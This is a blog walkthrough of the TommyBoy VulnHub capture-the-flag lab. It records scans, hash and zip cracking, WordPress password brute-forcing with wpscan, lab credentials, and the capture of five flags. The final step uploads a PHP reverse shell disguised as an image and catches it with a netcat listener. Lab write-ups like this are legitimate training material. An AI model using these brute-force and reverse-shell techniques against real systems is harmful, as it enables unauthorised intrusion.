Tommyboy CTF

TommyBoy Vulnhub CTF Challange Cracked


Hi, There In this post you will learn how to CTF the TommyBoy challenge there are 5 flags and we are going to capture each flag.

To download Tommy boy [Click here]

Have any doubt use the discord server.




To CTF the 5 hidden flags.

Tommyboy Hacking Phases

Finding IP

To find the target IP just enter arp-scan -l

Nmap scan

Just running a -A scan

nmap -A

Found the port 80,22 and 8008 are open, Let’s note this down.

Nikto Scan

Running a Nikto scan to find any possible vulnerability.

nikto -h

1st Flag Capture

The 1st flag was inside the /robots.txt file, From Nikto I have found that /robots.txt is open.


First flag: B34rcl4ws

View page source

To view the page source I am just entering curl http://192.1681.2

We can find a YT link and let’s go to the link.


After viewing the Video I have found that it is a url.


After clicking on the first post I have found there is another URL called /richard. Let’s use /richard instead of prehistoricforest.

Click on the chockedrichard.jpg and download the file to desktop.

Exif tool

Using the Exif tool to find the hash hiding inside the jpg file.

exiftool shockedrichard.jpg

We can see the hash in the place of user comment and I decryptd the hash and it’s password is spanky

Hash: ce154b5a8e59c89732bc25d6a2e6b90b  

Password: spanky

2nd Flag capture

I have found the second flag which is hinding inside the below url.


Second Flag:  Z4l1nsky

Entering spanky password to blog post

You noticed one of the post is password protected to unlock it enter the decrypted password that is spanky

Once you entered the password the post will be readable and take a look at the blog post there are many hidden things.

1. There is something about nickburns

2. There is an FTP service running and hosted on a Non-standard port. Also, the FTP server goes up and down with a regular frequency of 15 mins

Nmap check open ports

nmap -p- -sV –open

Can find that the port 65534 is open let’s access the port using FTP

Access the target using FTP

ftp 65534

cat readme.txt

3rd Flag capture

Now we know there is another URL called

Let’s go there and let’s use port 8008 to access it.

Now, run the dirb command

dirb /usr/share/wordlists/rockyou.txt -a "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25" -X .html

We are running the dirb command to get the fallon1.html file. 

Go to the above link and we will be seeing this ????????

Click on the third flag.

3rd Flag: TinyHead

Additionally, download the zip file and explore the hint file.

Capturing 4th Flag

Downloading zip file.

There is a hint given to crack the zip file.

To crack the zip file password let’s generate a password using crunch.

crunch 13 13 -t bev,%%@@^1995 -o /root/Desktop/dict.txt

Cracking zip file using john

Cracked the password.

Password = bevH00tr$1995

Unzip file


cat passwords.txt

Username: bigtommysenior

Password: fatguyinalittlecoat  <partial password>

Wpscan to enumerate wordpress

wpscan -u --wordlist=/usr/share/wordlists/rockyou.txt --username tom

User: tom

Password: tomtom1

Login to WordPress

User: tom

Password: tomtom1

Once logged in you can see there is one post.

Username: bigtommysenior
Password: fatguyinalittlecoat1938!!

SSH connecting

ssh bigtommysenior@
Username: bigtommysenior 
Password: fatguyinalittlecoat1938!!

ls -la

cat el-flag-numero-quatro.txt

4th Flag: EditButton

Restoring website

To capture the 5th flag we need to restore the site to normal level.

cp callahanbak.bak /var/www/html/index.html

Capture the last flag

Going to the above link and uploading this payload usr/share/webshells/php

Coming back to the terminal

cd /var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/ 
cd uploads/
mv php-reverse-shell.png php-reverse-shell.php
nc –lvp 1234

Now click on the below link to open the shell
ls -la 
cat .5.txt

5th Flag –     Buttcrack

Ads Blocker Image Powered by Code Help Pro

Ads Blocker Detected!!!

We have detected that you are using extensions or brave browser to block ads. Please support us by disabling these ads blocker.Our website is made possible by displaying Ads hope you whitelist our site. We use very minimal Ads in our site


Scroll to Top